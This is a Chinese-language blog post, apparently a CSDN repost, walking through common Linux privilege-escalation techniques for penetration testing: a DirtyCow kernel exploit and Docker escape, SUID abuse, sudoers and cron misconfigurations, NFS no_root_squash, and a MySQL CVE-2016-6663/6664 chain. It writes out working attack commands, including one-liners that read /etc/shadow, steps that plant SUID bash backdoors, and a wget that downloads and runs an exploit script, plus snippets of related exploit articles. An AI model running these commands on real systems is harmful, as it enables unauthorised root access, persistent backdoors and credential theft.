mysql提权方式linux_Linux提权的几种常用姿势

最新推荐文章于 2024-05-12 17:30:39 发布
最新推荐文章于 2024-05-12 17:30:39 发布
阅读量194 收藏 2
点赞数
文章标签: mysql提权方式linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39882948/article/details/113951665
版权
本文详细介绍了多种Linux系统下的权限提升技术,包括利用内核漏洞如 DirtyCow 漏洞进行本地提权,使用SUID文件提权,通过sudo配置错误提权,操纵计划任务,NFS共享权限滥用,以及MySQL的漏洞利用提权等。这些技术揭示了系统安全的重要性,并提醒管理员加强权限管理和系统更新。
摘要由CSDN通过智能技术生成

在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。

1、内核漏洞提权

提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,同时可以通过该漏洞实现Docker容器逃逸,获得root权限的shell。

1.1 本地内核提权

(1)检测内核版本

# 查看系统发行版本

lsb_release-a

# 查看内核版本

uname-a

d4a8db2845c38be6ab569626881acdea.png

(2) 下载,编译生成exp文件

bypass@ubuntu:~$ make

bypass@ubuntu:~$

2a15c9c9de930a5ab1c4fbe42d499349.png

(3)执行成功,返回一个root权限的shell。

53d4b9796651b77729128eba079889dd.png

1.2 利用DirtyCow漏洞实现Docker逃逸

(1)进入容器,编译POC并执行:

b38f74154e0f02a8221229d4cd397413.png

(2)在攻击者机器上,成功接收到宿主机反弹的shell。

528741084a9782171df45f8db6d5e758.png

1.3 Linux提权辅助工具

github项目地址:

https://github.com/mzet-/linux-exploit-suggester.git

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

(1)根据操作系统版本号自动查找相应提权脚本

78df54a48aa12f8dae1131802e06c9c4.png

(2)根据提示下载poc,编译执行。

20ec6800706a313596cebee8b426e551.png

2、利用SUID提权

SUID是一种特殊权限,可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件,那么就可以在运行该文件的时候获得root用户权限。

(1)在Linux中查找可以用来提权的SUID文件

find / -perm -u=s -type f 2>/dev/null

d4084fca3f24debe698980a4d21c0cf2.png

(2)通过find以root权限执行命令

a627550c58a630548136f1aeab548460.png

可用作Linux提权的命令及其姿势:

#Find

find pentestlab-exec whoami \;

#Vim

vim.tiny/etc/shadow

#awk

awk'BEGIN{system("whoami")}'#curl

curl file:///etc/shadow

#Bash

bash-p

#Less

less/etc/passwd

#Nmap

nmap--interactive

3、SUDO提权

普通用户在使用sudo执行命令的过程中,会以root方式执行命令。在很多场景里,管理员为了运维管理方便,sudoer配置文件错误导致提权。

(1)设置sudo免密码

$vi /etc/sudoers

在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL

(2)查看sudo的权限

630f1af0a42977e8b43aa74f220122c5.png

4、计划任务

如果可以找到可以有权限修改的计划任务脚本,就可以修改脚本实现提权。本质上,就是文件权限配置不当。

(1)查看计划任务,找到有修改权限的计划任务脚本

ls -l /etc/cron*more/etc/crontab

1e077e9867504488ca011e105687e244.png

(2)在mysqlback.sh 添加 SUID shell后门,当定时任务以root再次执行的时候,可以获取root权限

cp /bin/bash /tmp/shell

chmod u+s /tmp/shell

91b8e320ba7ce2ff79b14a81678d2e85.png

5、NFS提权

当服务器中存在NFS共享,开启no_root_squash选项时,如果客户端使用的是root用户,那么对于共享目录来说,该客户端就有root权限,可以使用它来提升权限。

(1)查看NFS服务器上的共享目录

sudo showmount -e 10.1.1.233

597c2af9ccdc0d1db6a3d36917250fdc.png

(2)创建本地挂载目录,挂载共享目录。使用攻击者本地root权限创建Suid shell。

sudo mkdir -p /tmp/data

sudo mount-t nfs 10.1.1.233:/home/bypass /tmp/data

cp/bin/bash /tmp/data/shell

chmod u+s /tmp/data/shell

8b03ed54ea127c8a383e3075f045b7a2.png

(3)回到要提权的服务器上,使用普通用户使用-p参数来获取root权限。

de46045583f664cfcf775f2c0343d914.png

6、MySQL提权

MySQL提权方式有UDF提权,MOF提权,写入启动项提权等方式,但比较有意思的是CVE-2016-6663、CVE-2016-6664组合利用的提取场景,可以将一个www-data权限提升到root权限。

(1)利用CVE-2016-6663将www-data权限提升为mysql权限

cd /var/www/html/gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient

./mysql-privesc-race test 123456 localhost testdb

(2)利用CVE-2016-6664将Mysql权限提升为root权限:

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh

chmod 777 mysql-chowned.sh

./mysql-chowned.sh /var/log/mysql/error.log

Linux提权几种常用姿势
01-11 2万+
在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。 1、内核漏洞提权 提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,同时可以通过该漏洞实现Docker容器逃逸,获得root权限的shell。 1...
Windows提权几种常用姿势
热门推荐
01-11 4万+
当获取主机权限时,我们总是希望可以将普通用户提升为管理员用户,以便获得高权限完全控制目标主机。Windows常用提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、B...
mysql提权方式linux_Linux提权几种常用方式
weixin_32631729的博客
01-28 1970
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
Linux mysql root 提权
系统运维
12-30 224
*Usage: *$id *uid=500(raptor)gid=500(raptor)groups=500(raptor) *$gcc-g-craptor_udf.c *$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc *$mysql-uroot-p *Enterpassword: *[.....
linux mysql 远程提权_MySQLLinux)远程数据库提权漏洞
weixin_39846191的博客
01-19 124
漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。 use DBI(); $|=1; =for comment MySQL privilege elevation Exploit This exploit adds漏洞在12月1日...
mysql root linux,Linux mysql root 提权
weixin_27228507的博客
05-05 196
*Usage:*$id*uid=500(raptor)gid=500(raptor)groups=500(raptor)*$gcc-g-craptor_udf.c*$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc*$mysql-uroot-p*Enterpa...
Linux提权几种常用方式
01-04 4万+
在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就...
mysql 反弹shell_Linux几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1451
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
mysql用户root提权
11-13
mysql用户root提mysql用户root提
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1742
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
sqlmap mysql udf提权_Mysql提权-基于Mysql的UDF提权Linux系统)
weixin_34696006的博客
01-30 805
基于Mysql的UDF提权(Linux系统)【实验目的】??通过本实验理解如何通过webshell结合sqlmap自带的dll文件对Linux系统进行UDF提权,熟悉UDF提权的主要方法。【实验环境】攻击机:Kali-pri用户名college,密码360College目标靶机:CentOS-sqli-lab用户名college,密码360College【实验原理】??scp命令简介:??scp是...
mysql(linux)远程数据库提权漏洞_MySQLLinux)远程数据库提权漏洞
weixin_36050664的博客
02-07 293
小编的话:Kingcope神牛又放干货了。漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。use DBI();$|=1;=for commentMySQL privilege elevation ExploitThis expl...
Linux提权--第三方软件MYSQL数据库提权(WEB+本地)
最新发布
金灰的博客
05-12 988
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
linux mysql udf 提权
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 979
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
linux mysql mof提权,mysql提权之mof提权
weixin_39629631的博客
05-10 293
拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权首先介绍mof提权,直接案例演示找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof 代码如下#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{Eve...
linux mysql 提权
weixin_30539835的博客
03-12 361
*Usage:*$id*uid=500(raptor)gid=500(raptor)groups=500(raptor)*$gcc-g-craptor_udf.c*$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc*$mysql-uroot-p*En...
CentOS 7下详述mysql-8.0.20的Linux安装教程
本篇文章详细介绍了在Linux环境下安装MySQL 8.0.20的全过程,适合那些需要在CentOS 7系统中部署MySQL数据库的读者参考。首先,文章指导如何确认系统是否已安装过MySQL,如有则通过删除相关目录、配置文件、用户和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值